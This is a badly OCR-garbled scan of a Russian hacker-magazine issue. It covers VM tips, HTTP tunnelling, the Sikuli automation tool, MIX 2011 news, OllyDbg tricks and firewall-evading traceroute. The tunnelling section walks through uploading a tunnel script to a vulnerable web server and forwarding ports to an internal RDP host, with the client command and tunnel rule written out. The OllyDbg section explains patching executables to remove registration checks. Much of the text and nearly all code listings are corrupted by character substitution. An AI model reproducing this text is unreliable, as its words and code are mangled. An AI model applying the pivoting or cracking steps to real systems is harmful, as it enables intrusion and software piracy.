идем в ѴѴіпсІоѵѵз и подключаем тот сетевой диск, с которым 
будем работать. Он появляется на рабочем столе Мае 05 X. Ну и, 
само собой, в «Проводнике» ѴѴіпсІоѵѵз. 

#10. Универсальный совет 

Если без хитрой настройки обойтись можно, то без знания 
основного функционала софта обойтись нельзя ну никак. 

Простой пример. Я каждый раз вижу, что люди выключают вир- 
туальные машины (неважно даже, какой софт они используют), а 
потом, когда в них вновь появляется необходимость, включают 
их заново. Люди, зачем?! В любой программе для виртуализа- 
ции давно предусмотрен режим «ВизрепсІ/Резиппе», который 
позволяет «заглушить» виртуальную машину за считанные 
секунды и также быстро вернуть ее к работе. Состояние памяти 
и состояние внутренних устройств виртуального компьютера 
сохраняется на жестком диске в виде файла. Гостевая система 
выводится из спячки буквально за секунды вместе с теми при- 
ложениями, с которыми ты ее «засуспендил». т 
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I Степан «Біер» Ильин (іѵѵіМег.сот/БІераЫ 




Про НТТР-туннелирование 





Понадобилось мне тут на днях вос- 
пользоваться достаточно известным 
приемом, а именно — НТТР-туннел ингом. 
О существовании решений, позволяющих 
создать ТСР-соединение поверх НТТР- 
запросов, я знал давно, но на практике 
никогда не использовал. Как оказалось, 
это действительно неплохо работающий 
способ обойти файрвол и достучаться до 
внутренних хостов локальной сети через 
веб-сервер, который открыт «наружу». 
Если ты сможешь залить на этот сервер 
специальный веб-сценарий, то с большой 
вероятностью получишь возможность 
обращаться к узлам из локальной сети 
этого сервера, которые при этом в инете 
не открыты! Любое подобное решение 
состоит из двух частей — клиента и сер- 
вера, которые инкапсулируют трафик в 
обычные НТТР 6ЕТ- и Р05Т-запросы и 
передают в таком виде данные между 
собой. 

Данные при этом сжимаются, криптуются 
и кодируются в Ьазе64. Существует много 
реализаций подобного подхода, в том 
числе немало коммерческих. Опытные 
товарищи посоветовали две бесплатные 
разработки: гейиЬ [ зепзерозЕсот/ІаЬз/ 
ІооІз/репІезі/гесІиЫ и НТТРТиппеІ [ ЬЛр- 
ІиппеЕзоигсеІогое.пеІ: ]. Мне пригляну- 
лась первая, так как ее серверная часть 
(та, которая заливается на веб-сервер] 
доступна в трех вариациях: на ЛВР, РНР 
и А5РХ. В зависимости оттого, какие 
технологии используются на веб-сервере, 
можно выбрать подходящий вариант. 
Клиентская часть при этом написана 
на Заѵа и, соответственно, может быть 
запущена под любой ОС. Итак, как это 
работает? 

Рассмотрим конкретный пример. 
Допустим, пентестер Иван, проводя 
исследование, нашел в некотором веб- 
сценарии уязвимость и может загрузить 
на сервер скрипт для НТТР-туннелинга. 
При этом ему стало известно, что где-то 
внутри локалки находится РРй-сервер 
с названием хоста Іегт-зегѵ.ѵісііт.сот, 
к которому нет доступа «снаружи» из-за 
файрвола. Брандмауэр пропускает к веб- 
серверу только НТТР-трафик и больше 



иЬипІОО.ѵіс іш.сот 




ззМ.ѵісІіт.сот 

ничего. Подключиться к этому серверу 
и другим хостам из внутренней локаль- 
ной сети Иван может с помощью НТТР- 
туннелинга. Это выглядит так: 

1. Иван заливает на сервер скрипт 
геОибдзр, который становится доступным 
по некоторому адресу (пусть это будет 
иЬипіОО.ѵісІіт.сот/ирІоасІз/геОиЬдзр). 

Это серверная часть, и она не нуждается 
в настройке. 

2 . На локальной машине запускается 
клиентская часть гейиН — геОиЬСІіепТ 
Это консольное приложение, которому в 
качестве параметра для запуска пере- 
дается адрес только что загруженного 
скрипта: 

$ з'аѵа гейиІіСІіепІ: иЬип1:0Ѳ. ѵісіііт. сот 
80 /ирІоасІБ/пейиІі .]Бр 

3. Указать адрес серверной части мало 
— необходимо еще отконфигурировать 
туннели с помощью админки, которая по 
умолчанию запускается на 1010 порту. 
Ивану требуется пробросить локальный 
порт 1234 на порт 3389 (ПРО) хоста Іегт- 
зегѵ.ѵісііт.сот, поэтому правило будет 
следующим: 

[сгеаТеТиппеІ] 

1234:1:егт-5егѵ. ѵіс1:іт. сот: 3389 

4 . Все, теперь если Иван подключит- 
ся с помощью любого РОР-клиента к 
Іоса Плозіи 234, то весь его ТСР-трафик 
будет инкапсулироваться в НТТР-запросы, 
которые передаются на иЬипЮО.ѵісІіт. 
сот/ирІоасІз/геОиІ'щзр, а оттуда уже 
переадресуются на целевой сервер. Таким 
образом, он получит желанный доступ к 
удаленному рабочему столу. 




(егт-зегѵ.ѵісііт.сот 



Тут надо сказать, что гейиН не ограничи- 
вает количество соединений, поэтому ты 
можешь создать несколько туннелей для 
разных хостов и разных сервисов (напри- 
мер, 55Н) и использовать их одновремен- 
но! Ради интереса я попробовал еще и 
НТТРТиппеІ, которая оказалась не менее 
замечательной разработкой. 

Ее большой плюс заключается в наличии 
специальной клиентской версии с удобным 
6111-интерфейсом (только для ѴѴіпсІоѵѵз]. 
Серверная часть есть в двух вариантах: на 
РНР и Регі’е. При этом НТТРТиппеІ может 
работать в качестве ЭОСКЭ-сервера. 
Соответственно, подключаясь к внутрен- 
ним хостам (например, в том же самом 
РОР-клиенте), ты можешь сразу указы- 
вать внутренний адрес хостов для под- 
ключения (если возвращаться к нашему 
примеру, то это Іегт-зегѵ.ѵісііпп.сопп). 

Но при этом надо предварительно поза- 
ботиться о том, чтобы в настройках про- 
граммы был прописан локальный 50СК5, 
созданный НТТРТиппеІ. На случай, если 
какое-то приложение не поддерживает 
работу через прокси, его трафик можно 
принудительно соксофицировать с помо- 
щью РгееСар ( Ігеесар.ги ), Ізоскз ( ізоскз. 
зоигсеіогде.пеі: ] или любых других анало- 
гичных приложений, пе 
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ВИЗУАЛЬНЫЕ 

СКРИПТЫ 



Зікиіі: простая автоматизация 
через скриншоты и РуНюп 



о Помнишь, какой фурор произвело появление ѴУѴЗІѴУУб-редакторов, 
которые позволили верстать веб-страницы человеку, вообще не 
знающему правил НТМЬ-разметки? Создатели Зікиіі решили 
переложить подобный опыт на процесс разработки сценариев, 
с помощью которых можно автоматизировать все что угодно. 

Новый подход: «Что ты видишь, то ты и программируешь». 



«ѴѴЬаі Ѵои Зее із ѴѴЬаІ Уои Зсгірі» — так в оригинале звучит принцип, 
на котором основана Зікиіі. Кстати, название программы — не слу- 
чайно. Само слово «Зікиіі» переводится с древнего индейского языка 
ѴѴіхагіса из Мексики как «глаз бога», что недвусмысленно намекает 
на возможность видеть все на экране. Проект появился в 2008 году, 



став результатом совместной работы китайского студента Шона 
Тсунг-Хсианга Чана из Массачусетского технологического института 
(МІТ), профессора Роба Миллера из департамента ЕЕС5 в МІТ и Тома 
Йеха, работающего над докторской в Университете штата Мэрилэнд. 
Разработчики считают, что некоторые задачи (например, по автома- 
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тизации тестирования пользовательского интерфейса) 
проще выполнять с помощью визуальных средств. Зікиіі 
использует алгоритмы распознавания текста и индек- 
сации изображений с помощью так называемых «визу- 
альных слов». Встроенные функции языка принимают в 
качестве параметров графические данные (скриншоты) и 
в зависимости от них выполняют определенные действия. 
Например, передав функции НоѵегО изображение кнопки 
«Пуск» в ѴѴіпсІоѵѵз, мы добьемся того, что Зікиіі переве- 
дет на нее курсор. Это лишь маленький пример того, что 
предлагает данная визуальная технология. 

Ключевая фишка разработки заключается в том, что ты в 
прямом смысле показываешь, что нужно сделать, а Зікиіі 
это повторяет. Таким образом, можно автоматизировать 
все, что ты видишь на экране, вообще без использования 
каких-либо специализированных АРІ. К примеру, запро- 
граммировать любые действия на веб-странице, работу с 
ѴѴіпсІоѵѵз/ипих/МасОЗ-приложением или даже с програм- 
мами на іРЬопе/АпсІгоісІ, используя симулятор устройства 
или подключение к его экрану по ѴІ\ІС. Для поиска кон- 
кретных элементов интерфейса Зікиіі использует лишь их 
изображения-скриншоты и позволяет легко эмулировать 
нажатия кнопкой мыши в нужных местах и ввод с клавиа- 
туры. Более того, в качестве скриптового языка в Зікиіі 
используется ЧуіЬоп, то есть в сценарии при необходимо- 
сти можно использовать любые конструкции Руібоп. 

Альтернативы? 

Вообще говоря, эмуляция действий пользователя — это 
довольно частая задача. Во врезке я привел несколько 
распространенных примеров того, когда это может потре- 
боваться. Злоумышленники, к примеру, могут использо- 
вать это в своих черных делах. В одном из номеров мы 
рассказывали про концепт трояна, который способен 
уводить деньги с кошельков электронных платежных 
систем. Тогда для эмуляции действий юзера использо- 
вались стандартные возможности ѴѴіпсіоѵѵб. Благодаря 
АРІ-вызовам системы можно эмулировать все что угодно: 
любые последовательности кликов и движения мыши 
пользователя, работу с окнами и приложениями. Если 
максимально просто описать работу того троя, то он 
самостоятельно открывал окно приложения платежной 
системы, затем переходил в интерфейс для перевода 
денег на другой счет и подставлял в качестве получателя 
левый кошелек. Но проблема такого подхода в том, что 
для использования АРІ-вызовов тебе необходимо быть 
программистом. 

Есть, конечно, решения, которые позволяют обойтись без 
сложного системного программирования. Это, к примеру, 
программа Аиіоі* ( аиІоіІзсгірІ.сот/аиІоііЗ ). предоставляю- 
щая простой скриптовый язык для автоматизации прак- 
тически любых задач. Весь ряд действий создаваемого 
макроса задается в виде вполне понятных команд, опи- 
рающихся на название окон и элементов интерфейса. К 
примеру, чтобы запустить оснастку Сотриіег Мападетепі 
и дождаться появления окна с одноименным названием, 
необходимо написать такой код: 

Кип ( ' стсі /с "сотрт^пгЩтБс" ' , 

@5у5*ет0іг, @51лІ_НЮЕ) 

1лІіпІл(аі1:Ас1:іѵе( "Сотриііег Мапа^етепі:" ) 

Уже проще, чем код на С++, но все равно выглядит 
устрашающе. Чтобы не писать макросы вручную, можно 
воспользоваться дополнительными утилитами (вроде 
АиІоІіМасгоѲепегаІог), которые в реальном времени 



преобразуют все твои действия в системе в макрос для 
Аиіоіі. Но даже эти ухищрения не позволяют приложению 
дотянуть до уровня Эікиіі по части простоты и доступ- 
ности написания побочных сценариев. Сейчас ты в этом 
убедишься. 

Работа с Зікиіі 

Чтобы не быть голословным, приведу пример довольно 
простого скрипта, который автоматически устанавливает 
ІР-адрес сетевого адаптера в Мае 05 X. 



ір = іпри^Г'РІесдо епіег *Ье ІР асЮгезБ ; "3 
дйіемау = 'Ѵ\ зоіяСір -5рѴЩ 1 * ‘ )[0:3] + [ , 254‘]> 



втісИАррС'Буаіелі Рге^егепсеэ , орр") 

Нтмтк 



с!іск( 






сИскС в <Н>Ь 



СІІскС Сопйдиге <Рѵ4: Чііпд РНСР 



3 



СІІскС Мапилііу 5 



ІР АсІЕІгеіѵ 0,0.0, 0 



) 



курсор +■ "ЧГ} 
^уреС"255.255.2$5.ЙЧО 

іуре^даѢе«ау+' , \^ 



с!іск( С Арріу ^ ) 



Да-да, именно в такой, максимально понятной и нагляд- 
ной форме, составляются скрипты в Зікиіі. Ничего не 
стоит составить аналогичный скрипт для Біпих и ѴѴіпсІоѵѵз. 
Приложение Зікиіі написано на Заѵа, и потому поддержи- 
вает все популярные платформы. Если посмотреть на 
пример более внимательно, то увидишь набор понятных 
команд (сІіскО, ѵѵаіШ, ІуреО и так далее), с которыми 
можно работать, даже не заглядывая в документацию. Но 
самое интересное заключается в том, что в качестве 
параметров этим функциям часто передаются нетексто- 
вые переменные, а изображения. Например, функции для 
клика по нужному элементу — сІіскО — передается 
изображение-скриншот этого элемента. Что может быть 
проще? 

Правда, для написания сценариев тут уже не отделаешь- 
ся обычным текстовым редактором — необходима специ- 
альная ЮЕ, которая по умолчанию входит в состав Зікиіі. 
Интерфейс этой среды довольно аскетичен и состоит из 
двух частей: непосредственно редактора кода и панели, 
на которой собраны основные функции для быстрого 
использования. Скажем, если нужно реализовать нажатие 
какой-то кнопки интерфейса, то мы выбираем функцию 
сІіскО, после чего среда разработки предложит тебе 
выбрать область экрана для создания паттерна. Понятно, 
что обвести здесь нужно элемент, на котором необходимо 
осуществить клик. Пара секунд — и очередной шаг наше- 
го скрипта готов! 




НТТР://ѴѴѴШ 

■ ■ 

> Ііпкз 

Если в процессе 
создания скриптов 
утебя возникнут 
проблемы, рекомен- 
дую официальный 
раздел О&А, где 
максимально быстро 
появляются ответы 
на поставленные во- 
просы и сообщения об 
исправленных багах: 
апзѵѵегз.ІаипсЬраб. 
пеі/зікиіі . 
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Среда разработки 5ікиІі 



3 кейса использования Бікиіі 



1. Автоматизация работы с любыми сервисами и приложе- 
ниями. В том числе с теми, которые не предоставляют АРІ. 
Попробуй посчитать, сколько времени ты мог бы сэкономить, 
если бы перестал выполнять одни и те же однотипные действия? 
Максимально быстрое и упрощенное создание макросов — конек 
Бікиіі. Создание примитивного скрипта, который выполняет 
запуск определенного приложения, осуществляет некоторые 
действия с интерфейсом и эмуляцию ввода данных — дело на 
пятнадцать минут. 

2 . Создание инструментов для автоматизированного тести- 

рования приложений. Каждый, кто занимается разработкой 
0111-программ, знает, насколько утомительным может оказаться 
кропотливое выполнение проверок по части интерфейса. Один 
добрый человек разобрался, как скрестить Бікиіа и фреймворк 
для тестировщиков ПО РоЬоІ Ргатеѵѵогк, и выложил об этом 
подробную инструкцию: . В основе решения лежат 

встроенные возможности Бікиіі по созданию юнит-тестов. 

3. Разработка ботов для самых разных игр. Если покопаться, то 
на ѴоиІиЬе можно найти не один ролик с демонстрацией того, как 
энтузиасты на коленке ваяют ботов для различных игр в соци- 
альных сетях. Автоматически собрать урожай на ферме — это 
далеко не предел мечтаний. Используя механизмы распознава- 
ния изображений и мощь Руібоп, вполне реально собрать бота 
для того же покера (правда, это чаще всего противоречит прави- 
лам подобных сервисов, и они, вполне вероятно, уже добавили 
Бікиіі в список запрещенных приложений). 

Необходимые функции 

Всего в распоряжении пользователя несколько десятков функций, 
большая часть которых в качестве параметров принимает именно 
изображения. Вот лишь некоторые из них: 

• с1іск(іш§) — производит клик мыши по паттерну, переданному в 
качестве параметра; 

• сІоиЫеСІіск(зсг) — двойной клик мышью; 

• пі§ІгІ;С1іск(5сп) — правый клик; 

• Иоѵег(Бсп) — наводит курсор на наиболее схожую с іппд область 
экрана; 

• ехіз’бз^сг) — возвращает значение Ігие, если находит изображе- 
ние на экране; 



• орепАрр(арр) — запуск приложения а рр ; 

• 5\л/і1:сИАрр ( арр ) — передает фокус приложению арр (если окно 
не найдено, то выполняется команда орепАрр); 

• Ііуре (Ііехі; ) — ввод текста Іехі; 

• -1:уре(5сг, ісехі: ) — ввод текста Іехі в элемент с графическим 
паттерном зсг; 

• рорир(ш5§) — выводит пользователю диалоговое окно с сооб- 
щением тзд. 

После недолгой практики становится ясно, что даже минималь- 
ного набора функций более чем достаточно, чтобы автоматизи- 
ровать любые действия. Кроме того, на помощь всегда приходит 
емкий мануал проекта. Если же нужно решить более сложную 
задачу, чем создание простого макроса, который будет выпол- 



Аналогичные решения 



РоиІіпеВоІ ( ) 

Известная в кругах тестировщиков интерфейсов утилита, 
которая быстро развивается. Это неудивительно, поскольку 
решение изначально рассчитано на то, чтобы быстро создавать 
текстовые скрипты для проверки работы интерфейса. В каче- 
стве синтаксиса можно использовать Разсаі, бБсгрІ и Вазіс. 
Приложение при этом так же, как и Бікиіі, имеет набор функций, 
которым в качестве параметра передаются графические сэм- 
плы. 

Рапогех ( ) 

Очень дорогой профессиональный инструмент для автоматиза- 
ции, обладающий большим количеством модулей на все случае 
жизни. В качестве скриптового языка используется С#, ѴВ.ЫЕТ 
и Руібоп. Решение интегрируется с Ѵізиаі Біисііо и обладает 
мощным компонентом для распознавания изображений Рапогех 
Ресогбег. 

Т-РІап РоЬоІ ( п.сот ] 

Этот проект раньше назывался ѴІЧСРоЬоІ и, как несложно 
понять, использует ѴІЧС-подключение к системе, на которой 
необходимо выполнить скрипт. Решение изначально разработа- 
но для автоматизации процессов с использованием в том числе 
анализа изображений. 

ЕддРІапІ ( ) 

Также, как и Т-РІап РоЬоІ, это решение основывается на ѴІЧС- 
подключении и предоставляет схожий функционал. На данный 
момент доступны версии для Ыпих, ѴѴіпбоѵѵз, Мае. 



► 034 



ХАКЕР 06 /149/ 201 1 








де 

№ н я * 



іѵМе таС г&рЛ'.( 

**«!■.( I > 

гкісіід]) 



Л 



»-.■ Ьц М («*■ 



*-:■■■ 1 I ** *—*■ ! М ч Ь р І -■* Фт м-> т-и-. 



■.ккіі МР ,Ц 

• ■ ( 'ЙеЬ іиі з-ыіі илиіі 



9 и лшшлп ш п Ги«ч іі шіп і 



ІАилІ Ѵік І«*я іілгі іря ■■ Ц^р**ч± ир вгііі 
-**- І>г4|і4}глчі1|-іг Г.>т+н 4 гѵ.нтЕнг 



Автоматическое нажатие кнопки «Уке» для сообщений 
от конкретного пользователя 




Черный и белый список вызовов в Зкуре 



нять за тебя некоторые рутинные действия — например, напи- 
сать бот для какой-то игры, то к твоим услугам весь функционал 
Руібоп’а, который можно полноценно использовать в своих 
скриптах. 

На сайте решения есть несколько наглядных демок ( зікиіі.огд/ 
сІето.зЬітІ ]. которые помогут тебе быстро понять, для чего 
нужны те или иные функции. С помощью небольших сценариев 
разными людьми реализованы следующие задачи: 

1. Проверка новых сообщений на РасеЬоок от определенного поль- 
зователя и автоматическая отметка их кнопкой Ыке. 

2. Система фильтрации входящих звонков в Зкуре. 

3. Видеонаблюдение с помощью веб-камеры, которая отслеживает 
появление и исчезновение разных объектов. 



Как работает Зікиіі? 



Главной частью системы является Зікиіі Зсгірі. По сути — это 
библиотека, которая автоматизирует взаимодействие с ОШ при 
помощи графических паттернов. Скрипт состоит из нескольких 
слоев на ^ѵа и ^Ібоп, но основное тут заключается в следую- 
щем. Модуль ]аѵа.а\л/І.РоЬоІ эмулирует нажатия клавиатуры и 
действия мышью. Распознаванием паттернов на экране зани- 
мается движок на С++, написанный с использованием извест- 
ного проекта ОрепСѴ. 

Любой скрипт на Зікиіі (.зікиіі) — это директория, которая 
состоит из исходника на Руібоп (.ру) и всех графических файлов 
(.рпд). Проект Зікиіі можно также сохранить в виде исполняемо- 
го файла. В этом случае директория .зікиіі сжимается гір’ом в 
единственный .зкі-файл. 

Зікиіі ЮЕ — это среда разработки, которая позволяет редакти- 
ровать и выполнять скрипты. Несмотря на то, что библиотеки 
Зікиіі Зсгірі есть и для других ЮЕ (например, Есіірзе’а), только 
оригинальная среда предоставляет удобные возможности для 
создания изображений-паттернов. 
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4. Бот для игры в пазл-игру Ве)е\д/еІесІ. 

5. Тестировщик интерфейса приложения на Апбгоіб. 

Работа с Зікиіі настолько проста, что не вижу смысла подробно 
останавливаться на работе со средой. Просто посмотри на скрин- 
шоты с примерами сценариев, и тебе все сразу станет ясно, т 



Использование Зікиіі для создания юнит-тестов 
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о Ню такое МІХ? Зто крупная девелоперская конференция, на которой 
МісгозоН демонстрирует свои последние технологии для разработки 
мобильного и ѵѵеЬ-софта. А еще это огромная тусовка, где помимо 
торжественных спичей проводится больше сотни узких тематических 
семинаров. Ниже 5 наиболее значимых итогов МІХ 2011 по версии □с. 



ІЕЮ РІаіТогт Ргеѵіеѵѵ 

Не прошло и месяца с момента релиза ІЕ9, как на МІХ’е был 
представлен Іпіегпеі: Ехріогег 10 Ріабогт Ргеѵіеѵѵ 1 — особенная 
техническая сборка скелета нового браузера, задача которой — показать 
разработчикам главные фишки будущей версии ІЕ. Само собой, 

Ріабюгт Ргеѵіеѵѵ не предназначен для полноценного использования: 
в нем нет соответствующего пользовательского интерфейса. Главные 
нововведения ІЕЮ РР1 коснулись поддержки С553: 

• С553 Миіііі-соіитп І_ауои1: 

• С553 Сгіб І_ауои1: 



• С553 РІехіЫе Вох І_ауои1: 

• С553 СгабіегЩз 

Кроме того, реализована поддержка ЕстаЗсгірЮ Зіхісі: Мобе, что 
позволяет наложить ограничения на используемые в скриптах 
«опасные» конструкции баѵаЗсгірІ, которые могут приводить к 
ошибкам. Примерами недопустимого сточки зрения Зіхісі: Мобе 
кода является дублирование имен переменных, некорректное 
использование беІеЮ и так далее. 

ІЕЮ РР1 выложен на нашем ОѴО, а также доступен на сайте 

іе.тісгозоЮсотЛеБІбгіѵе . 
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С помощью ѴѴе ЬМаІгіх можно в один клик развернуть 
почти любую популярную СМ5 



А5Р.ЫЕТ МѴС 3 

Значительные обновления получил фреймворк для создания ѵѵеЬ- 
приложений А5Р.ІЧЕТ МѴС 3. Так, новая версия фреймворка будет 
поддерживать НТМІ_5, а шаблоны проектов можно будет создавать 
с использованием семантической разметки. Кроме этого, в новую 
версию А5Р.ІЧЕТ МѴС вошла библиотека Мобегпігег и свежая версия 
ІОиегу. 

Отдельного упоминания заслуживает ѴѴеЬМаІгіх — новая бесплатная 
среда для ѵѵеЬ-разработки, включающая в себя ѵѵеб-сервер, 

СУБД ЗОБ Зегѵег Сотрасі и среды программирования. Установив 
ѴѴеЬМаІгіх, всего за несколько минут можно организовать рабочее 
место и среду для разработки ѵѵеЬ-приложений под АЗР.ЫЕТ и РНР. 
Также внутри ѴѴеЬМаІхіх есть удобный каталог ѵѵеЬ-приложений, 
который позволяет максимально быстро разворачивать на платформе 
такие популярные СМ3 как БоИМеИМике, БплЬгасо, ѴѴогбРгезз и 
Зоотіа!. 

ѴѴіпсІоѵѵз РЬопе 0$ 7.5 

Осенью 201 1 года платформу ѴѴіпбоѵѵз РЬопе ждут серьезные 
изменения. Самая важная новость, которая касается нашей страны 
— это поддержка русского языка и полноценный доступ к каталогу 
приложений ѴѴіпбоѵѵз РЬопе Магкеіріасе. Теперь у российских 
пользователей наконец появится возможность легально покупать 
и продавать приложения, не выдавая себя за американцев при 
регистрации и не джейлбрейкая телефон. 

Новая версия ѴѴР7 будет работать лучше и быстрее, причем 
преимущества можно будет ощутить сразу, не внося никаких 
изменений в приложения. В частности, скроллинг и ввод данных 
будут работать значительно плавнее и отзывчивее, даже при 
загрузке системы фоновыми приложениями. Улучшение алгоритмов 
декодирования графики ускорит рендеринг картинок, а переделанный 
сборщик мусора позволит увеличить производительность и сократить 
на 30% потребление памяти без рефакторинга приложений. 

Новая версия платформы будет оснащена Іпіегпеі Ехріогег 9 в роли 
мобильного браузера, причем мобильная версия девятого ІЕ основана 
на том же коде, что и настольная. В результате поддерживаются 
технологии по аппаратному ускорению графики и ЗаѵаЗсгірЕ Кроме 
этого, добавится поддержка аппаратной акселерации НТМБ5 Ѵібео, 
причем Місгозоіі анонсирует какой-то феноменальный результат этого 
ускорения: в продемонстрированном тесте ѴѴіпбоѵѵз РЬопе показал 
261рз, в то время как іРЬопе выдал всего 2Ьрз, а Апбгоіб на схожем 
железе — 1 1 брз. 

Выражаем особенный респект Місгозоіі за 1 500 новых АРІ и, в 
частности, за возможность прямой работы с сенсорами — камерой, 



компасом и акселерометром, реализованную поддержку сетевых 
сокетов, встроенное ВОЬ-хранилище 50Б Зегѵег Сотрасі 4.0 и 
полноценную поддержку многозадачности. К слову, многозадачность 
сделана с оглядкой на форм-фактор мобильных устройств: 
«свернутые» приложения будут работать ровно до тех пор, пока у 
устройства есть свободная память. Если активному приложению 
вдруг потребуются дополнительные ресурсы, он получит их за 
счет фоновых задач. Кроме того, специальный планировщик 
будет следить за энергопотреблением. Отдельно хочется отметить 
запланированный выход популярных софтин и игр на ѴѴР7: 
анонсирован выход Зкуре, а 25 мая уже стала доступна игра Апдгу 
Вігбз. 

ЗіІѵегІідЬі 5 Веіа 

Новая версия 5і Іѵегіід Ы: 5 включает в себя сотни разнообразных 
изменений, новых фич и АРІ. Отдельно можно отметить официальную 
поддержку х64-версий ОС и браузеров, а так же расширенные 
возможности по интеграции приложений с операционной системой. 
Подписанные ЗіІѵегІідЫ-приложения с сертификатом теперь могут: 

• запускать другие программы, установленные в операционной 
системе; 

• работать с аппаратными устройствами (например, можно легко 
организовать работу с ІІБВ-девайсами]; 

• иметь полный доступ к файловой системе. 

Помимо этого, заметны улучшения в работе с видео и звуком: 
поддерживается аппаратное ускорение и несколько новых фич 
вроде функции Тгіскріау для ускорения/замедления проигрывания 
медиа-контента. Также усовершенствованы функции работы с 
текстом: реализована поддержка многоколоночной верстки, улучшена 
гладкость и четкость шрифтов. 

Кіпесі іо г ѴѴіпсІоѵѵз 5РК 

Увидев успех неофициальных драйверов для Кіпесі: и количество 
различных энтузиастских хаков, Місгозоіі решила открыть эту 
платформу для использования на компьютерах. Как следствие 
— на МІХ’е анонсирован официальный 50К, который позволит 
разработчикам «легально» использовать Кіпесі: в своих системах: 
в играх, интерактивных приложениях и при строительстве 
человекоподобных роботов. 

Кіпесі: Іо г ѴѴіпсІоѵѵз 5йК предоставляет не просто доступ к Зй-сенсору, 
но и ко всем другим возможностям Кіпесі - массиву микрофонов, 
видеокамере, алгоритмам обработки изображения и массивов 
данных. 5БК будет предлагать работу с языками С#/ѴВ/С++: так, на 
презентации всего за несколько минут с помощью Ѵізиаі Біисііо и Кіпесі 
5БК была создана простая программка для рисования руками. ЛС. 
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■ ■ Алексей «бгеепйод» Тюрин, ОЗесРВ.ги, Оідііаі Зесигііу (адггггіодГСдтаіІ.сот) 





ЗАДАЧА: ОТРЕДАКТИРОВАТЬ ЕХЕ'ШНИК 
С ПОМОЩЬЮ ОНУРВО. 



РЕШЕНИЕ: 

Итак, предположим, у насесть какая-то софтина, чей функционал нам 
хотелосьбы изменить. Причинтакомужеланию может быть много. На- 
пример, убрать проверку о регистрации программы, то есть кра кнуты 
Конечно, модификация ехе’шника — не самая хорошая практика в 
кракинге, куда пафоснее намутить кейген, но это несколько другая тема. 
В качестве другого примера можно взять клиент кОрепЕбде и его 
модификацию для благих целей, о чем недавно писал Алексей Синцов в 
статье про архитектурныеуязвимости. Думаю, понятно, что мы говорим 
о ситуации, когда отсутствует доступ к исходникам. Так какэто можно 
сделать? Способов, как всегда, несколько. Но в данном случае мы 
воспользуемся услугами дебаггера ОНуОЬд. Во-первых, потому что он 
входит в джентльменский набор нарядус ЮАРго и ѴѴіпйЬд, а во-вторых, 
потому что он прости доступен. 

Важный момент— найти то место, которое хочется изменить. Нотутмо- 
гутпомочьтолько голова на плечах, пучокзнаний, да брейкпоинты (бря- 
ки).Хотя плюсОИуОЬд —у нас есть возможность динамически следитьза 
происходящим в программе, пошагово выполнять программный код. 

Но приступим кделу. Исходим изтого, что с местом мы определились. 
Далее, нажав <пробел>, мы имеем возможность поменятьассемблер- 
ные инструкции. Все наши изменения автоматически сохраняются в 
виде так называемых патчей, просмотреть которые можно, кликнув по 
«Ѵіеѵѵ-> РаІсЬез». Что важно, при следующем запуске ОНуОЬд данные 
патчи погрузятся автоматически, так что можно временно отключить 
бряки и за пустить софтинку, чтобы посмотреть на результаты. Сами 
патчи можно, аналогично брякам, включать, отключать, а также пере- 
ключаться между ними. 

Патчи, бряки и вводимые комметарии хранятся в одноименныхс ис- 
следуемой программой .ибб-файлах, которые лежат по стандарту рядом 
с ОНуОЬд (указывается в ибсі раіЬ в настройках). 




Список «патчей» и сохранение изменений 

Если результат изменений нас устраивает, то все отлично, и можно 
создавать экзешник. Сохранить можно либо конкретный патч, либо все, 
которые в данный моментактивны. Для этого: 

1. Правый клик в главном окошке. 

2. Сору *о ЕхесиІіаЫе. 

3. АН тосІіЯса1:іоп. 

4. В новом окошке видим получаемый файл. 

5. Правый клик - 5аѵе Іііе. 

Дело сделано. 

Хотелосьбы отметить еще одну приятную особенность: на месте ехе- 
файла можетбыть любая библиотека. То есть исполняется программа, 
в ней модули — библиотеки. Дебажим ехе’шник, попадаем в нужную 
библиотеку, вносим изменения и сохраняем аналогичным способом. 




ЗАДАЧА: СОХРАНИТЬ ПОЛОЖЕНИЕ 
БРЕЙКПОИНТОВ МЕЖДУ ЗАПУСКАМИ 

онурво. 



РЕШЕНИЕ: 

Брэйкпоинты (бряки) одна из основных вещей в любом дебаггере. Но, 
ксожалению, по стандарту наша любимая Олька не сохраняетих для 
разных сессий дебагга какого-либо приложения. Поставил бряки, 
поработал, а при следующем запуске — снова ищи их в приложении и 
ставьзаново. Причинатакого подхода не совсем ясна. Тем не менее, 
чтобы ОІІуОЬд сохраняла бряки, требуется всего лишь поставить галку 
в настройках: 

1) Меню -> Орѣіопв РеЬи§§іп§ ОрІііопБ -> 5есигі1:у; 

2) Ставим галку «1§поге Сгс оТ сосіе зесіііоп». 




Сохраненные Олькой бряки 



► 038 
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Стоит отметить, что сохраняются при этом не только обычные бряки 
ІІМТЗ/ОхСС, но и хардварные. Крометого, есть еще одно решение. 
Можно использовать специальный плагин — Вгеак роіпі ппападег 
ріид-іп, скачать который можно тут: ресІгат.гесІЬІѵе.сопп/сосІе/ 
оЦусІЬд рІидіпз/оЦу Ьр тап . Плагин умеет импортировать/экспорти- 
ровать брейкпоинты, а также подгружать их автоматом при старте уже 



дебаженного файла. Особого профита я отнего не нашел. Разве что 
можно сохранить несколько наборов брейкпоинтов и подгружать по 
мере необходимости какой-то определенный. Хотя, возможно, я что-то 
и упустил. 

Все вышесказанное верно также и для Іттипііу ОеЬиддег, что логич- 
но. 




ЗАДАЧА: РАСКРЫТИЕ СЕТЕВОЙ 
ИНФРАСТРУКТУРЫ В ОБХОД 
ФАЙЕРВОЛОВ. 



РЕШЕНИЕ: 

Задача звучит грандиозно, хотя подразумевает что-то более про- 
заичное :). Здесь имеется в виду следующее: постараться узнать 
максимум инфы о какой-то сетке, которая находится за файерво- 
лом. Как ни странно, для обхода файерволов и сбора информации 
чего только не придумывают! Всевозможные тонкости, ух... Нои 
простейшие вещи очень часто работают. Например, стандартная 
тулза Іга се го іЛ (ігасегі). Простейшая идея — отправляем на хост 
в интересующей нас сети I СМ Р- па кеты со значением ТТІ_ от 1 до 
числа, соответствующего количеству хостов до данного хоста, 
инкрементируя по 1 . В ответ нам приходят сообщения об ошибках 
(«ТТІ_ равен 0 и пакет сбрасывается») со всех этих хостов. Таким 
образом мы получаем ІР’шники хостов этого пути. Причем если 
мы трэйсим хост в сетке за файером, то мы можем получить вну- 
тренние ІР-адреса данной сети. А это как раз то, что нам надо. Но 
сетевые файеры частенько настраивают на блокировку пакетов 
ІгасегСа. Что же делать? Воспользоваться новым ігасегГом. Что 
же тут можно придумать нового? А вот что — посылать ІСМР- 
пакеты не просто так, а в контексте какой-то ІР-сессии, то есть 
